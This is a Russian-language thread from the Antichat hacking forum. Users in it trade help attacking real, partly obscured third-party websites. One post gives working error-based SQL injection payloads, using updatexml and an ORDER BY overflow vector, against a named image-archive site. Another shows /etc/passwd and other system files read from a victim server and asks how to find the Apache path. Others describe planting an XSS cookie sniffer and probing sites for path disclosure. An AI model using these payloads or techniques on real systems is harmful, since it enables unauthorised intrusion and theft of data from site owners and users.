ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.01.2015, 00:34
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Сообщение от XAMEHA
XAMEHA said:
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
|
|
|

28.01.2015, 02:13
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
вы ошибаетесь. ошибка возникает при добавлении в лог. даже если так, то mq = on, а передаваемый URL — str
|
|
|

28.01.2015, 09:48
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Да, можно наблюдать, что параметр достаточно экранируется. Ещё можно заметить, что используется драйвер MySQL Improved, а значит, что наиболее вероятно в запрос ни один из параметров непосредственно не попадает. Пациент мертв дважды.
|
|
|

28.01.2015, 17:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
Код:
Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17
ничего не даёт, кроме раскрытия путей, верно?
|
|
|
|

28.01.2015, 17:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
Код:
Code:
http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17
ничего не даёт, кроме раскрытия путей, верно?
ну и раскрытие информации о сервере
|
|
|

29.01.2015, 12:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 364
Репутация:
0
|
|
Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?
|
|
|
|

29.01.2015, 13:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от CyberTm1
CyberTm1 said:
Добрый день! Кто-нибудь может подсказать как проверить на уязвимость GHOST удаленный сервер, а не собственный?
http://habrahabr.ru/company/dsec/blog/249007/#comment_8247401
|
|
|

01.02.2015, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Насчёт XSS. Делал по этому примеру воспользовался своим шеллом. Отредактировал файл .htaccess создал файл s.php с тем кодом и имедж ..Потом решил на себе поэкспериментировать и когда все сделал перешел по вредоносной ссылке.. но в итоге пришел отчет на почту только IP а куки были ПУСТЫ
вроде все правильно настроил, раз отчет пришел Ноо.. И еще вопрос когда перехожу на ссылку отображается сайт и уязвимое место и весь код в расшифрованном виде.. т.е видно где залит сниффер
|
|
|
|

01.02.2015, 17:48
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от vikler
vikler said:
Код:
Code:
http://sutton{GOOGLE INDEX}images.com/searchre{GOOGLE INDEX}sult.aspx?archive=Archive&search=08gp03a'&page=9
Не получается здесь раскрутить у меня
Кто-нибудь может? Ну или не обызательно в этом скрипте, на сайте полно дырок вообще
В данном скрипте раскрутить можно только через ошибку, так как уязвимый параметр участвует в 2-х запросах с разным количеством полей:
Код:
Code:
SELECT count(*) from images where (match(filename,description,supplementalcategories,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000
SELECT filename,fullpath,description,title,keywords,credit from images where (match(filename,description,supplementalcategories,title,keywords,credit) against('("INJ")' IN BOOLEAN MODE)) AND (archive='Archive') ORDER BY lastmodified DESC, id DESC LIMIT 2000
Запросы составлены таким образом, что составить универсальный вектор с использованием UNION SELECT нельзя. Пример вывода через ошибку:
Код:
Code:
archive=Archive&search=08gp03a'*updatexml(1,concat(0x3A,version()),1)*'&page=9
archive=Archive&search=%22%29%27%20IN%20BOOLEAN%20MODE%29%29AND%28archive=%27Archive%27%29ORDER/**/BY%28SELECT%28i/**/IS/**/NOT/**/NULL%29-%28-9223372036854775808%29FROM%28SELECT%28(SELECT version())%29i%29a%29%20+--+&page=9
Последний вектор дает 475 байтов вывода.
|
|
|

02.02.2015, 19:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 34107
Репутация:
0
|
|
Всем добрый вечер. Ребята помогите раскрыть путь к сайта.
http://subdomain1.subdomain2.domain.com/
web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)
web application technology: Apache 2.2.20, PHP 5.3.6
back-end DBMS: MySQL 5.0
пробовал и нашел:
Код:
Code:
/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd
-------------------------------------
Результат ноль:
Код:
Code:
· /var/www/html/
· /var/www/web1/html/
· /var/www/sitename/htdocs/
· /var/www/localhost/htdocs
· /var/www/vhosts/sitename/httpdocs/
· /etc/init.d/apache
· /etc/init.d/apache2
· /etc/httpd/httpd.conf
· /etc/apache/apache.conf
· /etc/apache/httpd.conf
· /etc/apache2/apache2.conf
· /etc/apache2/httpd.conf
· /usr/local/apache2/conf/httpd.conf
· /usr/local/apache/conf/httpd.conf
· /opt/apache/conf/httpd.conf
· /home/apache/httpd.conf
· /home/apache/conf/httpd.conf
· /etc/apache2/sites-available/default
· /etc/apache2/vhosts.d/default_vhost.include
---------------------------------------
etc/passwd
Код:
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
не могу найти путь к апаче
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|